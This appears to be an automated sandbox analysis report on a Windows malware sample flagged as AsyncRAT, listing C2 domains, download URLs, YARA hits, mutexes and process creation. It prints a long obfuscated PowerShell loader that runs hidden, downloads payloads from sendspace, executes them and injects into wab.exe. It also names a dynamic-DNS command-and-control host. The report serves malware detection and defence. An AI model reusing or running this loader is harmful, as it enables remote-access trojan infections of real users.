        Source: Malware configuration extractorURLs: dhhj.duckdns.org
        Uses dynamic DNS services
        Source: unknownDNS query: name: dhhj.duckdns.org
        Source: global trafficTCP traffic: 192.168.2.6:49711 -> 12.202.180.134:8797
        Source: Joe Sandbox ViewIP Address: 69.31.136.17 69.31.136.17
        Source: Joe Sandbox ViewIP Address: 12.202.180.134 12.202.180.134
        Source: Joe Sandbox ViewIP Address: 104.21.28.80 104.21.28.80
        Source: Joe Sandbox ViewIP Address: 69.31.136.57 69.31.136.57
        Source: Joe Sandbox ViewASN Name: FISERV-INCUS FISERV-INCUS
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: global trafficHTTP traffic detected: GET /pro/dl/w4e2qb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /dlpro/5990f4102977ad47c8b1158344464586/664f92e4/w4e2qb/Bystoerrelse.fla HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: fs13n2.sendspace.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /pro/dl/6f2c5c HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /dlpro/2e5b0068e88ecbc579c4ba215340ac1a/664f9316/6f2c5c/JXfZIuRPwNaOvold98.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: fs03n5.sendspace.comConnection: Keep-AliveCookie: SID=8h7tvviacjavkonspru2dnmd45
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /pro/dl/w4e2qb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /dlpro/5990f4102977ad47c8b1158344464586/664f92e4/w4e2qb/Bystoerrelse.fla HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: fs13n2.sendspace.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /pro/dl/6f2c5c HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /dlpro/2e5b0068e88ecbc579c4ba215340ac1a/664f9316/6f2c5c/JXfZIuRPwNaOvold98.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: fs03n5.sendspace.comConnection: Keep-AliveCookie: SID=8h7tvviacjavkonspru2dnmd45
        Source: global trafficDNS traffic detected: DNS query: www.sendspace.com
        Source: global trafficDNS traffic detected: DNS query: fs13n2.sendspace.com
        Source: global trafficDNS traffic detected: DNS query: fs03n5.sendspace.com
        Source: global trafficDNS traffic detected: DNS query: dhhj.duckdns.org
        Source: wab.exe, 0000000A.00000002.3343246570.0000000007DD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabq
        Source: wab.exe, 0000000A.00000002.3343246570.0000000007DA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/env
        Source: powershell.exe, 00000003.00000002.2793992270.0000017BC15B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fs13n2.sendspace.com
        Source: powershell.exe, 00000003.00000002.2910312975.0000017BCF83F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2621078427.0000000005BD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000006.00000002.2617612973.0000000004CCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000003.00000002.2793992270.0000017BBF7D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2617612973.0000000004B71000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3357559154.0000000023691000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000006.00000002.2617612973.0000000004CCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000003.00000002.2793992270.0000017BC1579000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sendspace.com
        Source: powershell.exe, 00000003.00000002.2793992270.0000017BBF7D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 00000006.00000002.2617612973.0000000004B71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
        Source: powershell.exe, 00000006.00000002.2621078427.0000000005BD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000006.00000002.2621078427.0000000005BD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000006.00000002.2621078427.0000000005BD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: wab.exe, 0000000A.00000002.3343246570.0000000007D40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs03n5.sendspace.com/
        Source: wab.exe, 0000000A.00000003.2605230606.0000000007D57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs03n5.sendspace.com/79c4ba215340ac1a/664f9316/6f2c5c/JXfZIuRPwNaOvold98.bin
        Source: wab.exe, 0000000A.00000003.2605230606.0000000007D57000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2613840916.0000000007D57000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3343246570.0000000007D40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs03n5.sendspace.com/dlpro/2e5b0068e88ecbc579c4ba215340ac1a/664f9316/6f2c5c/JXfZIuRPwNaOvold
        Source: wab.exe, 0000000A.00000003.2605230606.0000000007D57000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2613840916.0000000007D57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs03n5.sendspace.com/hf
        Source: wab.exe, 0000000A.00000003.2605230606.0000000007D57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs03n5.sendspace.com/om:443
        Source: powershell.exe, 00000003.00000002.2793992270.0000017BC159E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fs13n2.sendspaX
        Source: powershell.exe, 00000003.00000002.2793992270.0000017BBFC63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2793992270.0000017BC159E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fs13n2.sendspace.com
        Source: powershell.exe, 00000003.00000002.2793992270.0000017BBFC63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2793992270.0000017BC159A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2793992270.0000017BC159E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2793992270.0000017BBFC5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2793992270.0000017BC1579000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fs13n2.sendspace.com/dlpro/5990f4102977ad47c8b1158344464586/664f92e4/w4e2qb/Bystoerrelse.fla
        Source: powershell.exe, 00000006.00000002.2617612973.0000000004CCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000003.00000002.2793992270.0000017BC0A66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
        Source: powershell.exe, 00000003.00000002.2910312975.0000017BCF83F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2621078427.0000000005BD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: powershell.exe, 00000003.00000002.2793992270.0000017BC1091000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2793992270.0000017BBF9FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com
        Source: wab.exe, 0000000A.00000002.3343246570.0000000007CE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/
        Source: wab.exe, 0000000A.00000002.3343137596.0000000007C40000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2605230606.0000000007D57000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3343246570.0000000007D23000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2613840916.0000000007D57000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2605161502.0000000007D50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/6f2c5c
        Source: powershell.exe, 00000003.00000002.2793992270.0000017BBF9FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/w4e2qbP
        Source: powershell.exe, 00000006.00000002.2617612973.0000000004CCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/w4e2qbXR
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
        Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
        Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
        Source: unknownHTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.6:49699 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.6:49700 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.6:49708 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.6:49709 version: TLS 1.2

        Key, Mouse, Clipboard, Microphone and Screen Capturing

        barindex
        Yara detected AsyncRAT
        Source: Yara matchFile source: 0000000A.00000002.3357559154.0000000023691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: wab.exe PID: 5892, type: MEMORYSTR

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: amsi32_4324.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: dump.pcap, type: PCAPMatched rule: Detects AsyncRAT Author: ditekSHen
        Source: 0000000A.00000002.3343246570.0000000007DD2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
        Source: 0000000A.00000002.3357559154.0000000023691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
        Source: 0000000A.00000002.3343246570.0000000007DA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
        Source: Process Memory Space: powershell.exe PID: 5700, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: powershell.exe PID: 4324, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: wab.exe PID: 5892, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
        Very long command line found
        Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6358
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6382
        Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6358Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6382Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD347EB9393_2_00007FFD347EB939
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD347EAB893_2_00007FFD347EAB89
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD347E64A73_2_00007FFD347E64A7
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD347E3DF23_2_00007FFD347E3DF2
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD347E427B3_2_00007FFD347E427B
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD348B40493_2_00007FFD348B4049
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04B5E9286_2_04B5E928
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04B5F1F86_2_04B5F1F8
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04B5E5E06_2_04B5E5E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_023065C010_2_023065C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_02305CF010_2_02305CF0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0230A7B010_2_0230A7B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_023059A810_2_023059A8
        Source: amsi32_4324.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: dump.pcap, type: PCAPMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
        Source: 0000000A.00000002.3343246570.0000000007DD2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
        Source: 0000000A.00000002.3357559154.0000000023691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
        Source: 0000000A.00000002.3343246570.0000000007DA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
        Source: Process Memory Space: powershell.exe PID: 5700, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: powershell.exe PID: 4324, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: wab.exe PID: 5892, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
        Source: classification engineClassification label: mal100.troj.evad.winCMD@13/9@4/4
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Bevogtes140.OutJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2752:120:WilError_03
        Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3360:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1c0vfxcq.np5.ps1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5700
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=4324
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
        Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\xff.cmd" "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Lassoing = 1;$Rasophore='Sub';$Rasophore+='strin';$Rasophore+='g';Function Ugedagens($Outdure){$Frys=$Outdure.Length-$Lassoing;For($Interproducing=5;$Interproducing -lt $Frys;$Interproducing+=6){$Unlecherous+=$Outdure.$Rasophore.Invoke( $Interproducing, $Lassoing);}$Unlecherous;}function Semuljegrynets($Barbarized){. ($adenoncus) ($Barbarized);}$Currycombing=Ugedagens 'ChronM,jerno istnzDes ei .rdmlSanktlW lliaLevul/Outca5Averr..eman0Uforl Ort,g(HandlWSendei Precn,niffd,edeoo Bor wDioxas W,gg Ko,svNCrossTInope Overl1 indr0Klamm.Op.ak0Mavel;Instr Ro ndWnonfaiBeg.enFlygt6Totaq4Lufth;Bo.ti RadixFylgj6 G.nn4Tachy;ha ss Ek.pr Sy.ev lndi: iece1Tilst2J ntj1Pisto.Antid0Bavn.)Plant oraGKibose,odlicRe,ulk,verfoFli o/Succu2N.ntr0Pulve1hj.ej0Forfa0ubeta1 Ekst0 Fort1Fl,pp LeddFRebediTorskrselvgehumatf,robyoBarvexSkjo /Dress1,ydro2urtid1 cent.Begal0Opera ';$Huaco=Ugedagens ' Zo,lUSkaloskrnereRe rorDema,-StormAEmpreg DisseLandsnMartetM tap ';$Fluernes=Ugedagens 'Serv hCathatUna tt Su,ephe,ges cevi:Du,le/Sil,n/ApprewDiletwA,vaewPlkke. Milis La,reFarmanLadeddCrystsNonh.pEje.ta NivecCurn.eHande.MaadgcCicerochalomAston/Anen,pV.rmtrLyzetoAr,th/IodocdLinielKom.e/AfskewMulti4HomebeEtabl2Preenq Udadb K.st ';$Astrographer=Ugedagens 'Homol>Fossi ';$adenoncus=Ugedagens 'Afmnsi ExhoeSv,nfxInku. ';$Minussernes='Olieraffinaderiets';$Omskrivelses = Ugedagens ' V,rde oplacPopl,hFi ucoBronc Svog%B.lthaKiropp Svamp De,adOut aaU,trytTorrea,push%Shodd\SyndeBS.mshe,aksevSmileoSmalngAlumitUnderePolemsDeam,1Cervi4Dispe0Quadr. Me,lO Sv tuintegtAnt.s V,let&St,ll&Canto For.oeOmlydcStuddhFaktuoAmts OrdretDire. ';Semuljegrynets (Ugedagens 'Re,et$ lectg DirelOrthooS rapb TranaSequelSmerg:StillARe.idpAssaypv.rdelBlreraFol.euPlinksNeuroeM tenr Expls ode=Ka.ao( HardcUn elmPhagodGasco Nonre/Girl,clikvi Jordr$UndskOMaku mPantos Bli k Mor.rretsbi ForsvCharleH,athlAsylssDistieosteosTante)Udski ');Semuljegrynets (Ugedagens 'Netts$ C.okgelevtlSkeigoMisemb elveaRegovlFa,il:littoF pr.moExpanr S brvCons,aBesk.yKandi= Subp$ HopoFBjrgilInteguTapp,eToothr.pegenImpe.eTegnes Hyst.Bes as,igtipfungulS,andi U jetDok m(Punkt$RespeA Kr.dsAdnottG,derrS,mmeoZuluegBrom,rs.ranaEfterpKonflh fhne.umphrRling) .nsl ');$Fluernes=$Forvay[0];$Underabyss= (Ugedagens 'Bogka$rygergRugerlUdsmyoOffe bAcridaSkftelSkift:VegetF Ga eeS.rigepressrBlodsi Em ee Tetr= N.nrN Dybte Te,swFo,ho-ChaveO ymidbH terj Ove.eRullec kul,tUdfri St.tiSDiv,ryTruansMelilt FabiePhilom Mark.Por.uN evoceAristtMalap.QuentWFupmaespectb EncrC InfalBese.i.itike partnSpiset');$Underabyss+=$Applausers[1];Semuljegrynets ($Underabyss);Semuljegrynets (Ugedagens ' Auto$Stap Fnedere PrveeDruggrTurfsiHaplyeFogc.. N,tuHTaurieInexhaB ndedMinice IonirDharasFort [Nrtb $Op,inHK,nsluOkk paDusticDressoTrukn] Moll= .ott$TootiCSynaeumascurSl tsrC,lebyNonlycMerrio EccrmQu tabUnabsi,ingenresungCu,pi ');$aktualitetens=Ugedagens 'Gra.e$ BalsFForese F.ageOmulcrLaniti
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Bevogtes140.Out && echo t"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Lassoing = 1;$Rasophore='Sub';$Rasophore+='strin';$Rasophore+='g';Function Ugedagens($Outdure){$Frys=$Outdure.Length-$Lassoing;For($Interproducing=5;$Interproducing -lt $Frys;$Interproducing+=6){$Unlecherous+=$Outdure.$Rasophore.Invoke( $Interproducing, $Lassoing);}$Unlecherous;}function Semuljegrynets($Barbarized){. ($adenoncus) ($Barbarized);}$Currycombing=Ugedagens 'ChronM,jerno istnzDes ei .rdmlSanktlW lliaLevul/Outca5Averr..eman0Uforl Ort,g(HandlWSendei Precn,niffd,edeoo Bor wDioxas W,gg Ko,svNCrossTInope Overl1 indr0Klamm.Op.ak0Mavel;Instr Ro ndWnonfaiBeg.enFlygt6Totaq4Lufth;Bo.ti RadixFylgj6 G.nn4Tachy;ha ss Ek.pr Sy.ev lndi: iece1Tilst2J ntj1Pisto.Antid0Bavn.)Plant oraGKibose,odlicRe,ulk,verfoFli o/Succu2N.ntr0Pulve1hj.ej0Forfa0ubeta1 Ekst0 Fort1Fl,pp LeddFRebediTorskrselvgehumatf,robyoBarvexSkjo /Dress1,ydro2urtid1 cent.Begal0Opera ';$Huaco=Ugedagens ' Zo,lUSkaloskrnereRe rorDema,-StormAEmpreg DisseLandsnMartetM tap ';$Fluernes=Ugedagens 'Serv hCathatUna tt Su,ephe,ges cevi:Du,le/Sil,n/ApprewDiletwA,vaewPlkke. Milis La,reFarmanLadeddCrystsNonh.pEje.ta NivecCurn.eHande.MaadgcCicerochalomAston/Anen,pV.rmtrLyzetoAr,th/IodocdLinielKom.e/AfskewMulti4HomebeEtabl2Preenq Udadb K.st ';$Astrographer=Ugedagens 'Homol>Fossi ';$adenoncus=Ugedagens 'Afmnsi ExhoeSv,nfxInku. ';$Minussernes='Olieraffinaderiets';$Omskrivelses = Ugedagens ' V,rde oplacPopl,hFi ucoBronc Svog%B.lthaKiropp Svamp De,adOut aaU,trytTorrea,push%Shodd\SyndeBS.mshe,aksevSmileoSmalngAlumitUnderePolemsDeam,1Cervi4Dispe0Quadr. Me,lO Sv tuintegtAnt.s V,let&St,ll&Canto For.oeOmlydcStuddhFaktuoAmts OrdretDire. ';Semuljegrynets (Ugedagens 'Re,et$ lectg DirelOrthooS rapb TranaSequelSmerg:StillARe.idpAssaypv.rdelBlreraFol.euPlinksNeuroeM tenr Expls ode=Ka.ao( HardcUn elmPhagodGasco Nonre/Girl,clikvi Jordr$UndskOMaku mPantos Bli k Mor.rretsbi ForsvCharleH,athlAsylssDistieosteosTante)Udski ');Semuljegrynets (Ugedagens 'Netts$ C.okgelevtlSkeigoMisemb elveaRegovlFa,il:littoF pr.moExpanr S brvCons,aBesk.yKandi= Subp$ HopoFBjrgilInteguTapp,eToothr.pegenImpe.eTegnes Hyst.Bes as,igtipfungulS,andi U jetDok m(Punkt$RespeA Kr.dsAdnottG,derrS,mmeoZuluegBrom,rs.ranaEfterpKonflh fhne.umphrRling) .nsl ');$Fluernes=$Forvay[0];$Underabyss= (Ugedagens 'Bogka$rygergRugerlUdsmyoOffe bAcridaSkftelSkift:VegetF Ga eeS.rigepressrBlodsi Em ee Tetr= N.nrN Dybte Te,swFo,ho-ChaveO ymidbH terj Ove.eRullec kul,tUdfri St.tiSDiv,ryTruansMelilt FabiePhilom Mark.Por.uN evoceAristtMalap.QuentWFupmaespectb EncrC InfalBese.i.itike partnSpiset');$Underabyss+=$Applausers[1];Semuljegrynets ($Underabyss);Semuljegrynets (Ugedagens ' Auto$Stap Fnedere PrveeDruggrTurfsiHaplyeFogc.. N,tuHTaurieInexhaB ndedMinice IonirDharasFort [Nrtb $Op,inHK,nsluOkk paDusticDressoTrukn] Moll= .ott$TootiCSynaeumascurSl tsrC,lebyNonlycMerrio EccrmQu tabUnabsi,ingenresungCu,pi ');$aktualitetens=Ugedagens 'Gra.e$ BalsF
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Bevogtes140.Out && echo t"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Lassoing = 1;$Rasophore='Sub';$Rasophore+='strin';$Rasophore+='g';Function Ugedagens($Outdure){$Frys=$Outdure.Length-$Lassoing;For($Interproducing=5;$Interproducing -lt $Frys;$Interproducing+=6){$Unlecherous+=$Outdure.$Rasophore.Invoke( $Interproducing, $Lassoing);}$Unlecherous;}function Semuljegrynets($Barbarized){. ($adenoncus) ($Barbarized);}$Currycombing=Ugedagens 'ChronM,jerno istnzDes ei .rdmlSanktlW lliaLevul/Outca5Averr..eman0Uforl Ort,g(HandlWSendei Precn,niffd,edeoo Bor wDioxas W,gg Ko,svNCrossTInope Overl1 indr0Klamm.Op.ak0Mavel;Instr Ro ndWnonfaiBeg.enFlygt6Totaq4Lufth;Bo.ti RadixFylgj6 G.nn4Tachy;ha ss Ek.pr Sy.ev lndi: iece1Tilst2J ntj1Pisto.Antid0Bavn.)Plant oraGKibose,odlicRe,ulk,verfoFli o/Succu2N.ntr0Pulve1hj.ej0Forfa0ubeta1 Ekst0 Fort1Fl,pp LeddFRebediTorskrselvgehumatf,robyoBarvexSkjo /Dress1,ydro2urtid1 cent.Begal0Opera ';$Huaco=Ugedagens ' Zo,lUSkaloskrnereRe rorDema,-StormAEmpreg DisseLandsnMartetM tap ';$Fluernes=Ugedagens 'Serv hCathatUna tt Su,ephe,ges cevi:Du,le/Sil,n/ApprewDiletwA,vaewPlkke. Milis La,reFarmanLadeddCrystsNonh.pEje.ta NivecCurn.eHande.MaadgcCicerochalomAston/Anen,pV.rmtrLyzetoAr,th/IodocdLinielKom.e/AfskewMulti4HomebeEtabl2Preenq Udadb K.st ';$Astrographer=Ugedagens 'Homol>Fossi ';$adenoncus=Ugedagens 'Afmnsi ExhoeSv,nfxInku. ';$Minussernes='Olieraffinaderiets';$Omskrivelses = Ugedagens ' V,rde oplacPopl,hFi ucoBronc Svog%B.lthaKiropp Svamp De,adOut aaU,trytTorrea,push%Shodd\SyndeBS.mshe,aksevSmileoSmalngAlumitUnderePolemsDeam,1Cervi4Dispe0Quadr. Me,lO Sv tuintegtAnt.s V,let&St,ll&Canto For.oeOmlydcStuddhFaktuoAmts OrdretDire. ';Semuljegrynets (Ugedagens 'Re,et$ lectg DirelOrthooS rapb TranaSequelSmerg:StillARe.idpAssaypv.rdelBlreraFol.euPlinksNeuroeM tenr Expls ode=Ka.ao( HardcUn elmPhagodGasco Nonre/Girl,clikvi Jordr$UndskOMaku mPantos Bli k Mor.rretsbi ForsvCharleH,athlAsylssDistieosteosTante)Udski ');Semuljegrynets (Ugedagens 'Netts$ 